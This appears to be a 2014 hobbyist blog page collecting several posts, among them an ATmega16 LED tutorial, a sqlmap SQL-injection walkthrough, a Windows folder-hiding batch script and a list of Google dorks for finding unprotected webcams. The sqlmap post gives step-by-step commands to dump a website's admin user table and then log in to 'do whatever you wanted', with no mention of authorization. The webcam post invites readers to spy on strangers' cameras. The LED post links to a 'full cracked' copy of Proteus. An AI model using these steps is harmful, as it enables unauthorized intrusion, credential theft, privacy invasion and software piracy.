Friday, May 9, 2014

Simple LED Project Explained Using ATMEGA 16 (in Proteus)

This post is for the beginners who wants to put their first step towards Embedded system or Robotics. 
Lets start...
First set up your computer ready before starting...
1. Download and Install Proteus 8.0 full cracked 
    Download it from our software section. Click here to download
2. Download and Install AVR Studio and Win AVR 2010.
    Download it from our software section. Click here to download

Note: While working with Proteus 8.0 it may crash often after running for once. So for that save your work before simulating. To avoid this buy the professional version from the developer and support their work. Or else you have to restart it every time after simulating.

Atmega 16 is a micro-controller. To know more about it and its pin configuration Click here

After completing the above steps. Follow these steps:

Working on Proteus:-
Step 1: Open Proteus.
Step 2: Click on ISIS.

Step 3: Click in P to pick library.

Step 4: Select the component you want to connect.


Step 5: Connect the Pin as per the circuit diagram.


Now its programming time!!! Get Ready programmer!!!

Working with AVR Studio:
Step 6: Open AVR Studio 4.

Step 7: Follow create a new file and name it.

Step 8: Select the micro controller type as ATMEGA 16.

Step 9: Start writing program.

Step 10: After writing the program compile it by pressing F7.

Note: You should know any programming language to proceed forward. That will make your task easy.

Lets start from basic.

"avr/io.h" : Header file for input output of AVR
"avr/delay.h" or "util/delay.h" : Header file to add delay function.
DDRX : Used to assign the Slot A,B,C,D either to input or output. Where X = A / B / C /D.
PORTX : Used to assign the value for the pins of the slot when  it is set to output. Where X = A / B /C /D.
PINX : Used to get the value when the port is assign as input.
_delay_ms(i) : Used to provide delay in milliseconds. Where i is any integer. Example: _delay_ms(500) provides delay of 500 milliseconds. 

Q. How to assign the PORT as input or output?
--> Input is always assign as LOW and output is assign as HIGH.
       Example: To assign slot A and B as input we can write as PORTA=0x00 or PORTA=0b00000000 or PORTA=0. Similarly for B, we can write as PORTB=0x00 or PORTB=0b00000000 or PORTB=0.
       To assign slot C and D as output we can write as PORTC=0xff or PORTC=0b11111111 or PORTC=255. Similarly for D we can write as PORTD=0xff or PORTD=0b11111111 or PORTD=255.

***Where 0x is for hexadecimal, 0b is for binary and simply writing the integer is in decimal format.

Note: You can make any port as input or output. It totally depends on you.

Problem Statement 1:
Make a simple LED program to blink all LED simultaneously with a delay of 500 milliseconds.
--> Open AVR studio and set yourself ready to program.
                                
#include<avr/io.h>
#include<avr/delay.h>
int main()
{
DDRA=0xff;
PORTA=0x00;
while(1)
   {
   PORTA=0xff;
   _delay_ms(500);
   PORTA=0x00;
   _delay_ms(500);
  }

Using the program in Proteus:
Step 11: Open Proteus and right click on the micro controller and click on edit.


 Step 12: Select the program file which you have made. Make sure the file extension is .hex.

Step 13: Click open and then click ok.
Step 14: Click on simulation button shown in the figure.



Proteus Crashes:



All you can do is close it and then again start it. Or better you buy the software if you can save enough buck from your pocket-money.



Try more program with different problem statement or wait for my next problem statement in my next post. Till then happy learning. And don't forget to comment if it was really helpful for you. 

Like us --> Facebook

For any query feel free to ask @ prashantsavior@gmail.com

Author: Unpredictable
Source provided by: Aakash Kumar Das

Tuesday, April 29, 2014

HACKING WEBSITE (SQLi) USING SQLMAP

Today I will introduce you a very simple tool which will ease your SQL injection procedure. With the help of this tool even a noob can also hack a website.

About Sqlmap:
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

To use this you need to download and install python. 

Installing and setting path for python:-
Step 1: Download python from www.python.org 
              (Download Python 2.7)
Step 2: Unzip that and install that in your computer.
Step 3: Go to control panel --> Go to System --> Click on Edit the system Environment variable.


Step 4: Then follow the steps given in the pic. Edit the environment variable as C:\python27;

Step 5: Click Ok and Restart your laptop.

Sqlmap:
Step 6: Download sqlmap from www.sqlmap.org.

Step 7: Unzip that and save that in your desired folder. (like I have saved that in C:)

Step 8: Open cmd by pressing windows + R. And then typing cmd and hit enter.

Step 9: Go to the folder where sqlmap is stored. 
C:> cd sqlmap 

Step 9: Run sqlmap and use it. Find a vulnerable url (how to find will discuss in other post, let here vulnerable url be www.vulnesite.php?id=23)
C:/sqlmap> python sqlmap.py -u www.vulnesite.php?id=23

Step 9: Then find the database of the website.
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dbs 

Step 10: Then find the tables and then column. (Let database found be admin)
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --tables -D admin
(tables found be admin)

C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --columns -D admin -T user

Step 11: Get all the data from the tables.
C:/sqlmap> python sqlmap.py -u "www.vulnesite.php?id=23" --dump -D admin -T user

Step 12: You get the username and password. Now you can find the admin login page and type the username and the password (if its in MD5 hash then you need to decode that from various website). Now login and do whatever you wanted to do.


For any query feel free to contact us @ prashantsavior@gmail.com and don't forget to like us on Facebook.



Monday, April 28, 2014

Learn Python

Python is a widely used general-purpose, high-level programming language. Its design philosophy emphasizes codereadability, and its syntax allows programmers to express concepts in fewer lines of code than would be possible in languages such as C. The language provides constructs intended to enable clear programs on both a small and large scale.
Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or proceduralstyles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.
Like other dynamic languages, Python is often used as a scripting language, but is also used in a wide range of non-scripting contexts. Using third-party tools, such as Py2exe, or Pyinstaller, Python code can be packaged into standalone executable programs. Python interpreters are available for many operating systems.
CPython, the reference implementation of Python, is free and open source software and has a community-based development model, as do nearly all of its alternative implementations. CPython is managed by the non-profit Python Software Foundation.

Click on the link below to download a bunch of books.

Download

For more details please free to contact us @ prashantsavior@gmail.com

Saturday, April 12, 2014

HOW TO MAKE NAMELESS FOLDER

Have you ever tried of making a nameless folder??? I guess if you ever tried with by just deleting the default folder name and hitting enter then again the default name comes. The same happens if you ever tried to make a folder named 'con', etc... Because there are certain keywords which has been assigned by the windows and is only for its internal use. Now the question comes how can we make nameless folder or folder named like con...
So for that simply follow the given steps...

Step 1: Make a folder in the drive where you want to make.
Step 2: Right click on the folder and then click on rename.
Step 3: Clear the default name by pressing backspace key.
Step 4: Switch on your Number lock (by pressing Fn + scroll ).
Step 5: Then keep on pressing alt with one finger and from other press k,i,i simultaneously (better say alt + 255 as k=2, i=5, when number lock is switched on).
Step 6: Then release all the keys and finally press Enter. Your nameless folder has been created.

alt + 255 actually prints a non-printable character which is not seen. Even if you try to press spacebar and then press enter, it won't work. I hope all of you have did this successfully.
Similarly, to make a folder named with con --> simply type con and then follow step 5 and 6.

Author: Unpredictable

If you have any query regarding this, feel free to contact us @ prashantsavior@gmail.com or simply comment on the below.

Wednesday, April 9, 2014

Hacker's Browser

                                                        OWASP MANTRA JANUS

OWASP, the different type of community which develops free application which can be trusted and used by all. They develop open source software for cyber security.
This time they came up with a browser which has all the capability and add on pre-installed which is required by every pentester and security geeks, it won't be odd to say that this browser is best for the hacker's as well as for cracker's.

You can download OWASP Mantra Janus from the link below

Click here to Download

Or

If you want to download it from the official site then go to the link below

Click here to proceed


About OWASP:
It was established as a not-for-profit charitable organization in the United States on April 21, 2004 to ensure the ongoing availability and support for our work at OWASP. OWASP is an international organization and the OWASP Foundation supports OWASP efforts around the world. OWASP is an open community dedicated to enabling organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. All of the OWASP tools, documents, forums, and chapters are free and open to anyone interested in improving application security. They advocate approaching application security as a people, process, and technology problem because the most effective approaches to application security include improvements in all of these areas.
OWASP is a new kind of organization. Our freedom from commercial pressures allows us to provide unbiased, practical, cost-effective information about application security. OWASP is not affiliated with any technology company, although we support the informed use of commercial security technology. Similar to many open-source software projects, OWASP produces many types of materials in a collaborative, open way. The OWASP Foundation is a not-for-profit entity that ensures the project's long-term success.

For more visit www.owasp.org

Tuesday, April 8, 2014

LOCK YOUR PRIVATE FILES WITH PASSWORD WITHOUT ANY SOFTWARE

Everyone seeks for some private software so that they can safely hide their files from unauthorized users. And for that they download many software for the purpose. Those software charges after the trial period is over. So why not you make a simple software by writing a simple program which can hide your private things at least with the noobs. So here is a simple batch programming with which you can keep your file safely.

Step 1: Go to control panel --> click on folder option --> click on view --> Click on 'Don't show hidden files, folders and drives' -->  click on apply --> click on OK.



Step 2: Create a notepad file in which drive you want to keep your secret file and paste the following code in the notepad.

cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD_GOES_HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Private
echo Private created successfully
goto End
:End

Step 3: Delete PASSWORD_GOES_HERE and write the password you want to set.

Step 4: Save the file as hide and extension as .bat and then close it.



Step 5: Click on the batch file created. A folder name Private will be created. Copy and paste all your important files in that folder and then close that folder. 



Step 6: Again click on the hide.bat then enter your choice as 'y'. Your folder will get hide.

Step 7: To unlock again click on the hide.bat and enter your password. You will get all your content back.



If you have any problem then feel free to contact us @ prashantsavior@gmail.com or you can also comment on the comment box given below. And if you liked the post then don't forget to give a like, it encourages us.

Author: Unpredictable 

Thursday, April 3, 2014

Access Unprotected Webcam (Webcam Hack)

Note: This is for educational purpose. We are not responsible if you do anything illegal with this.

There are  many unprotected webcams around the world and they have been scanned by Google bots. There are certain keywords in the Google through which you can access those webcams and see what is actually happening there live. These keywords are called Google dorks. All you need to do is to follow the two simple states.

Step 1: Open Google.
Step 2: Copy and paste any of the code. And you will get into very different webcams and spy on that.

inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”



Example: open a new tab --> type google.com --> copy and paste inurl:/view.shtm --> click on the search result that appers.
You can do these with other dorks too. 

Author: Unpredictable
If you have any query then feel free to contact us @ prashantsavior@gmail.com.